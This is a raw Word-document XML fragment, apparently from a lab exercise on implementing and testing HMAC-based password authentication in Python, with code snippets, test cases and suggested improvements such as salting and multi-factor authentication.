          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SECRET_KEY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200F5238" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D200D8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HMAC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provided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against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stored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hash provided_password_hash = generate_hmac(password, SECRET_KEY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4177116C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="1320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verify_hmac(provided_password_hash,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SECRET_KEY,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stored_password_hash): print("Authentication Successful!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE4237F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="7731" w:firstLine="479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True </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3268A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1320" w:right="5229"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("Authentication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Failed!") return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE573E9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339C6FB0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="6855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Simulating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login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attempt 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pacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137575B4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print("Welcome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System!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3127CD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="840" w:right="5229"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>username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username: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") password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password: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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D099CC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A8F508" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4861"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># Authenticate the user with HMAC authenticate_user(username,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password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CD3082" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="193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4FCAEE20" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371E280E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="1"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hmac_authentication.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF3602E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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05BD75F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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0625EFD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E2F1D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="8395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 xml:space="preserve">bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6564AE74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hmac_authentication.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628580D0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36ABA240" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="818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prompted,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password.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 based on the password and secret key stored within the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717C404C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BB95A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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Testing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Authentication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System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2568ECD4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45524D98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line="242" w:lineRule="auto"/>
        <w:ind w:right="757"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Correct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>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correct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(e.g.,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"userpassword"),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should print </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"Authentication Successful!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01778C20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line="264" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Incorrect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>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incorrect,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print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"Authentication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Failed!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62475B2D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6681A5FD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Improving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Authentication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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C9BBA5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54306F86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line="237" w:lineRule="auto"/>
        <w:ind w:right="956"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Session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Management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applications,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after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successful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authentication,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implement session management (e.g., using tokens) to manage user sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61334590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before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Salting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Salt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before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hashing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HMAC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increase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security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07009602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before="1"/>
        <w:ind w:right="543"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>More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Complex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Security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integrate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additional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features,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rate-limiting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login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attempts or using multi-factor authentication (MFA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C878565" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="196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4E06996" wp14:editId="503F77FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>294729</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2159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1590"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6173470" cy="215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1704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52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1704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8300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2C7D1" id="Group 31" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.2pt;width:486.1pt;height:1.7pt;z-index:-15725568;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="617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&#10;BAAEAPMAAAC0BwAAAAA=&#10;">
                <v:shape id="Graphic 32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gFHwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvBb/D8gRvdWOEVqOrSFXao//A6zP7TKLZt2l21ein7woFj8PM/IYZTxtTiivVrrCsoNeNQBCn&#10;VhecKdhtl+8DEM4jaywtk4I7OZhOWm9jTLS98ZquG5+JAGGXoILc+yqR0qU5GXRdWxEH72hrgz7I&#10;OpO6xluAm1LGUfQhDRYcFnKs6Cun9Ly5GAWHnZ7/robxp87ux/3i+/SgAz2U6rSb2QiEp8a/wv/t&#10;H62gH8PzS/gBcvIHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA+/4BR8MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 33" o:spid="_x0000_s1028" style="position:absolute;left:61704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vywwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvhX6H8Aq91Wwr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qu478sMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 34" o:spid="_x0000_s1029" style="position:absolute;left:3;top:15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h7dxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvgv8hPKE3zVqLtqtRtFBoD1W0ZcHbY/PcLN28LEmq23/fCILHYWa+YRarzjbiTD7UjhWMRxkI&#10;4tLpmisF319vw2cQISJrbByTgj8KsFr2ewvMtbvwns6HWIkE4ZCjAhNjm0sZSkMWw8i1xMk7OW8x&#10;JukrqT1eEtw28jHLptJizWnBYEuvhsqfw69VUHhv1rvt54Y+Ju2xnmXFyyYUSj0MuvUcRKQu3sO3&#10;9rtWMHmC65f0A+TyHwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMvOHt3EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3048,3048l,3048,,16764r3048,l3048,3048xem6173152,r-3035,l6170117,3048r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 35" o:spid="_x0000_s1030" style="position:absolute;left:61704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Mk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i18TJMMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3047,l,,,13716r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 36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Fj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tkCnl/iD5DrBwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC6dBFjwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 37" o:spid="_x0000_s1032" style="position:absolute;left:3;top:183;width:61734;height:31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0OxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8AQvi6a6i0o1iiiC4MX1D3p8NM+22LyEJmr99hthYY/DzPyGmc4bU4kH1b60rKDfS0AQ&#10;Z1aXnCs4HtbdMQgfkDVWlknBizzMZ62PKabaPvmHHvuQiwhhn6KCIgSXSumzggz6nnXE0bva2mCI&#10;ss6lrvEZ4aaSgyQZSoMlx4UCHS0Lym77u4mUoVuWZnBy9+Pue3d+rbefq8tIqU67WUxABGrCf/iv&#10;vdEKvkbw/hJ/gJz9AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGuWfQ7EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=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155626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96BD34" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="79"/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lastRenderedPageBreak/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10E56616" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8A0693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line="237" w:lineRule="auto"/>
        <w:ind w:right="597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successfully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HMAC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mechanism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authenticate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securely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comparing the generated HMAC of the password against the stored HMAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B122B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:right="359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correctly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identifies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authenticates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correct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entered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denies access if the password is incorrect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5464AA27" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="20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DEAC5E1" wp14:editId="22B61F95">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>298013</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2032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704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66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704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701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ACB82" id="Group 38" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.45pt;width:486.1pt;height:1.6pt;z-index:-15725056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&#10;di54bWxQSwUGAAAAAAQABADzAAAAwQcAAAAA&#10;">
